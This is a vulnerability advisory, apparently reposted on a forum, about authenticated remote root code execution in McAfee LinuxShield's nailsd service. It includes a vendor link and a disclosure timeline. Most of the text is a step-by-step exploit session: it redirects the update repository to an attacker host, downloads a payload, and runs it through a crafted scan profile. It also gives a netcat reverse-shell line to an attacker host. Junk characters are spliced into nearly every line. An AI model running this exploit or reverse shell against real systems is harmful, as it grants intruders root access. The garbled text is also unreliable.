    LinuxShield uses a web-browser interface, and a large number of7 F" `) w6 m  }4 A4 Q) D
    LinuxShield installations can be centrally controlled by ePolicy$ e2 w+ q/ ^- _/ D: }
    Orchestrator.8 V- k+ p% K9 Z7 q3 K

      w# I' F3 C- ]2 {) ?(Product description from LinuxShield Product Guide)
    * o! M  C7 @6 A% J
    3 [& ]( k8 ~) i+ \, N
    0 j- h* a/ U3 s5 O: y: f# J3 A# N# U
    Description:
    2 y0 Q, M- K2 E2 ^. `============
    6 L8 R7 V" J" t3 L5 r, u
    ) p; N: n( _# ~$ e$ JThis vulnerability allows remote attackers to execute arbitrary code; `- V6 F5 i0 X1 G: @
    on vulnerable installations of McAfee LinuxShield. User interaction1 {# s$ @, A) s8 P7 s  b
    is not required to exploit this vulnerability but an attacker must* L- f) S2 q( u; s# X" l  \* c2 W
    be authenticated." p0 {9 ?* P7 v- U$ e

    4 m: h1 ?0 n5 O& X+ M. ^The LinuxShield Webinterface communicates with the localy installed
    4 R: _. b3 r9 b' ^; Q"nailsd" daemon, which listens on port 65443/tcp, to do
    8 s; J1 n. J* y/ m1 }0 yconfiguration2 I" p. [4 n# s" C* Y9 c
    changes, query the configuration and execute tasks.
    8 f7 E5 {% A+ }; D- [2 F2 u& U% X1 d5 _  O6 O
    Each user, which can login to the victim box, can also authenticate" @& _. O" x9 @# ~& W5 r
    it self to the "nailsd" and can do configuration changes and8 ]$ e( ]5 s' F
    execute  e* w  g1 j9 P6 L5 ^
    tasks with root privileges.
    * v: K) _; ~) g( U; X0 m7 w& K( @* P& J7 w* H4 U
    A direct execution of commands is not possible, but it is possible to
    9 F- p7 B" L* H' D, o6 W4 H; ydownload and execute code through manipulation of the config and
    / Y/ X& f+ U+ E# d6 h' ~execute schedule tasks of the LinuxShield.# H7 B9 {$ k) ~7 \
    5 ?( d# ]1 m! `6 @. V$ v
    - _( p5 l- |- |- Z" H* a3 H
    walk-through (after the TLS handshake):# M. H6 k; a4 O7 j
    +--------------------------------------
    ; I- J  k7 W' _$ R& K6 T% g# r
    3 A: Z; o: z8 jnailsd > +OK welcome to the NAILS Statistics Service* `4 L) n* R, Z
    attacker> auth <user> <pass>
    + y, ~: q3 P! E# e9 I' inailsd > +OK successful authentication
      y( ~9 k5 n9 T2 M: j5 G# \: ]$ x2 L6 F0 T) X0 O5 A$ T% _
    # Set the Attacker repository to download our code from a httpd" Q; @" W' ~9 H8 l
    # (catalog.z)
    ) R) Q1 f7 K3 F5 ]#---------------------------------------------------------------
    3 W6 r& g. o& W. K+ g" @9 e" Dattacker> db set 1 _table=repository status=1 siteList=<?xml version
    + U. B) z  t4 D0 p( p' _* T="1.0" encoding="UTF-8"?><ns:SiteLists' W* B) B2 J2 T+ [' F: _' z. V
    xmlns:ns="naSiteLi
    ( M% A  R1 L( g$ T4 ]3 H7 hst" GlobalVersion="20030131003110"
    , \2 F* P! s3 E' [) N: M7 ILocalVersion="20091209
    . ^3 l; a/ g3 h161903" Type="Client"><SiteList
    - U' F( u8 ]: G6 j8 T1 }* o$ ^Default="1" Name="SomeGU
    7 L2 q" P% o; z" ~6 |! M; U6 ?: G0 p3 yID"><HttpSite Type="repository"
    ; C! @: h8 X" T( z" mName="EvilRepo" Order="1
    % l' w  U) c' A$ }$ S' A- U  s5 W" Server="<attackerhost>:80". j1 Y. Q0 y7 {! C+ t* d. ^
    Enabled="1" Local="1"><Rela
    , F9 s( i2 t3 n+ P0 L
    8 @( ]8 O2 G7 z- i7 j% ktivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    + a) n5 M5 I  {8 \rName></
    $ o& @8 n- `7 U0 V/ _0 \/ sUserName><Password: V* Z; s* \1 p) b  f+ D
    Encrypted="0"/></HttpSite></SiteList></
    & U8 [2 Y, k. S) M6 l2 g7 Pns:SiteLists> _cmd=update
    * P) v. X7 l* g% s' l! `nailsd > +OK database changes buffered.
    + i3 U7 I1 M4 H* D  [( `
    ! M: x: |9 c# \# Execute task to set the attacker repository
    ; M; X  |( e) A#---------------------------------------------------------------
    % e* @: ~0 C4 p& ~# a2 Qattacker> task setsitelist) v' d+ }+ u$ e3 `# e
    nailsd > +OK setting sitelist from CMA." n4 s& Q: j2 n! z
    ' W9 _( Q, c$ ]  ?. j! s
    # Execute the default Update task to download the code
    7 M) M( j  q, G* C# n#---------------------------------------------------------------' q3 F5 g, t7 Z0 u& @8 {
    attacker> task nstart LinuxShield Update
    ! F& ]9 O: M! C0 Onailsd > +OK task LinuxShield Update starting- v* r( w! V6 Q8 s. {  B2 J$ m2 S9 B
    % h( C( n. {( \' r/ O
    # Create a Scan profile, which executes our code. The profiles are; o- @/ ~* x( D' W& B& ~4 B
    # not stored in the database.; E- M! H: f5 E; B5 b, d2 `
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    * G, t" e4 b6 S#---------------------------------------------------------------
    . O+ H) r: ^# Z  d5 z  e  G$ _( M5 dattacker> sconf ODS_99 begin) Y$ r3 {: p$ x1 {& ?: I. A
    nailsd > +OK 12604008885 M3 J3 H: B8 C! @  T
    / x8 H. ^" @3 i8 z4 P
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the2 {  L9 {& n7 y5 a* P& j4 J
    path
    3 y; }: I9 @' H& Z1 X# g  z2 L! W# where our earlier downloaded catalog.z file is stored.
    # _( ]/ ?3 e/ e; C. f* o# (/opt/McAfee/cma/scratch/update/catalog.z)9 C& p6 g! ]7 O$ i1 U) m* m
    #---------------------------------------------------------------
    / j; D% ^) A3 W3 oattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    1 }# r8 g. C" I# l' p7 I' L. c$ |true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O: d, K" Z6 C, Q, X: c
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=" w' `" ]0 A8 K3 e* |& D
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng/ U# o# E2 h1 g# D( r6 s. t% h
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro: y5 K/ }+ g* ]$ X3 x, E
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ( P% u9 l" o$ }. P# e( G8 M" ^ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    - V, G9 A0 e  c+ b- ]ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd3 A* d: @: {) F, H6 y; r
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu+ V* \+ J) c: a0 e1 S& J0 y3 Q% S* t
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru' y9 q7 G$ t# a' d
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99. I3 ~" E( _+ D- z1 Y$ E0 u
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi- g, B  n# w4 r% i! i: A, l4 @
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil8 z! X. g. i* d4 U, L3 `0 Z8 \
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    " J3 H6 m9 N( ]) h6 u; qe nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr6 l/ W" {0 l* A( `$ O- ?' \* }. W
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm* _5 L0 G* |8 Y! l# q  {
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile% h% |+ o+ z( |/ D& g4 g
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    ' Z8 X, |4 @; _$ T: H$ h. G! crue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    6 X9 U! ^, c# z, m" o1 [ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
      s8 }. F1 T# R! Z00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    " L* k/ Q% O. W7 \2 i+ E; QODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    9 t. r4 D7 w4 P5 S- nter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    1 s$ a& M; `1 m, P% u. Rnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    8 V6 k4 `) U& Z& o2 [) k1 rofile.ODS_99.filter.extensions.type=extension nailsd.profil
    6 d& V4 G: z" {6 @; k1 H* a- j$ g: }e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    + R5 t) r+ r- Q* ^( m.action.Default.secondary=Quarantine nailsd.profile.ODS_99.  D, @4 b7 o  O  s1 t) `9 b: h6 M( Z
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    7 y0 t0 f' }' s" |& Z" gecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    9 V- ~# l5 a  y1 X, R* M) U6 Yss nailsd.profile.ODS_99.action.error=Block4 `/ Q6 @1 T( N+ H
    nailsd > +OK configuration changes buffered7 o  Q0 e8 I) {1 o
    attacker> sconf ODS_99 commit 1260400888, G0 P; Z# Q$ O. I" [
    nailsd > +OK configuration changes stored. i: ~$ J% _: P! d) M6 z' }
    " T$ b+ _9 r. v8 W
    # Set a scan task with the manipulated profile to execute the code
    5 |# u$ D$ p& A; S0 f1 V) H#---------------------------------------------------------------
    ; X0 t  ?# Y  Z1 ^attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy, x0 f* {% P! L, u1 H0 {
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    3 k2 [& }7 |$ n7 |+ a5 o' [mp;exclude:false timetable=type=unscheduled taskResults=0 i
    % u8 T" p$ U  e_lastRun=1260318482 status=Stopped _cmd=insert
    , ?" X3 O+ I' G1 A7 Onailsd > +OK database changes buffered
    $ I+ \" }' R# A7 M3 C# r/ w) J  A  L2 W! J7 c* ~
    # Execute scan task to execute the code
    : B. l, {: E& r1 T6 t/ r! N#---------------------------------------------------------------
    / V. _& Z7 p; {/ m: Eattacker> task nstart Evil Task4 |/ f/ H% B3 N' E3 o- n
    - w* D1 F* R/ V3 [
    +-------------------------------------- walk-through EOF% q) l# f* ?; b2 M& k

    1 d# k% z- Z* C. i
    + q, N) ?5 H- \; u. z' k' X- R$ CTo get a reverse root shell place something like this in the catalog.z
    & O+ q2 z$ x; i4 j+ E" M3 v$ P& X" `. ]4 R8 H) ]  a& t
    --- snip ---  Z0 G% |; b3 ^
    #!/bin/sh
    - _, d* m$ k: ~nc -nv <attacker_host> 4444 -e /bin/sh" Z. N/ ~3 f' {+ Z% ]5 ~
    --- /snip ---
      j6 c* {- ^/ [  W
    8 X# E! @3 X6 D1 ?& J' J& s3 w6 t) R* K1 i" T: y
    0 K5 Z7 h; I2 V) t3 X; T) z
    Proof of Concept :3 B0 @) y# n8 @
    ==================3 ~; D! u9 g# M7 E* x- _3 g

    2 e* e2 H* C0 N5 m( I6 |http://inj3ct0r.com/sploits/11165.tar.gz) p- N; a) U+ u4 ~; R$ D4 b
    " ^7 z: B2 H6 U( K' ?
    ; [+ S0 C* E2 C7 q( v9 @
    9 I1 M  ^' v4 B4 J3 q
    Solution:
    * }" s3 F' h0 Q& e, ]/ r* k=========
    * V5 n' B+ V0 s8 C$ t/ m- C* e2 R% Q1 a+ n$ q/ e* ]& q
    McAfee Advisory
    # R! |" S, R4 C" w  z+--------------+ A! s4 |( X0 t/ }5 c6 j
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB100074 e5 q) K8 y' i$ R( q
    2 \! D. A8 Q) q) J

    1 N. N2 ~: m! A5 |, m. x5 |$ ]2 a) Q2 p
    Disclosure Timeline (YYYY/MM/DD):
    & `: b8 i4 L$ b! v" e1 \, D=================================
    : k6 f6 \. g9 z: J" D$ ~: r; f2 u+ E  Q
    2009.12.07: Vulnerability found) m) I# _/ z7 n
    2010.02.03: Asked vendor for a PGP key
    1 c6 {0 e! H1 |4 s% Q5 a$ @2010.02.05: Vendor sent his PGP key
    + ?6 v& I+ Q( t; Z2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure; H/ Z4 ~* h7 |+ A* C0 v
    date (2010.02.18) to Vendor
    8 l$ i" f& {) r8 t9 ^2010.02.05: Vendor acknowledges the reception of the advisory+ q2 l1 M1 j: K+ b0 f3 k% ^/ e
    2010.02.16: Ask for a status update, because the planned release date is
    : M7 X. f* V# k  y$ @' Q/ Q2010.02.18.
    : U, {/ k$ G7 o! [/ A6 q2010.02.16: Vendor response that, they are currently working on a patch
    8 b$ {6 ?& ]# Z( t7 H& `7 q2010.02.17: Changed release date to 2010.02.25.
    9 }0 K( ]7 Y% J$ l2010.02.22: Vendor gives a status update, that they are able to release
    ! s( v5 Q- h6 L; i5 r) bthe patch on 2010.02.25.
    2 d% M+ P. I5 ]. }6 N4 O0 O9 z$ B* b' Y, i2010.02.24: Ask for a list of affected products and the advisory url.
    ; Z% {' q  |- c6 i) a6 Q2010.02.24: Vendor sends the list.
    : [. O8 s3 j5 g2 _' U6 N2010.03.02: Release of this Advisory9 ^& i( m/ \( d7 a8 q

    9 V" P4 g1 {' e
    / @, N( x0 A; R1 F( b! f2 @, u
    8 n! [) x% R* S
    1 J) Q) h1 Q; @/ R8 q
    4 J& _' J& Z& v& C* M8 e
    # P# A" S5 E: j* E
    + l3 a9 I' U; a6 ]8 V

    1 q  o0 S1 F3 n3 u. K4 L. Q9 g" y* n4 y* k
    9 J7 B7 D: Y9 s# ^

    # [7 i& F  x" _6 u9 C2 i; t& X5 t. [/ u' H4 g

    4 g0 O6 p8 B8 Y( ]5 M  Y# n' }% i9 S: q: c" v

    / s7 c6 t' G5 C. N7 O
    # \) [3 l" ^9 x2 s- R' T  s  Z7 f  o7 u/ ]  M% f
    ) P- d& `/ y2 ^  t* f+ u' ^( A
    6 _+ q: p& ?* F3 R

    : a( L' W2 O5 i1 l, P0 F  d公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表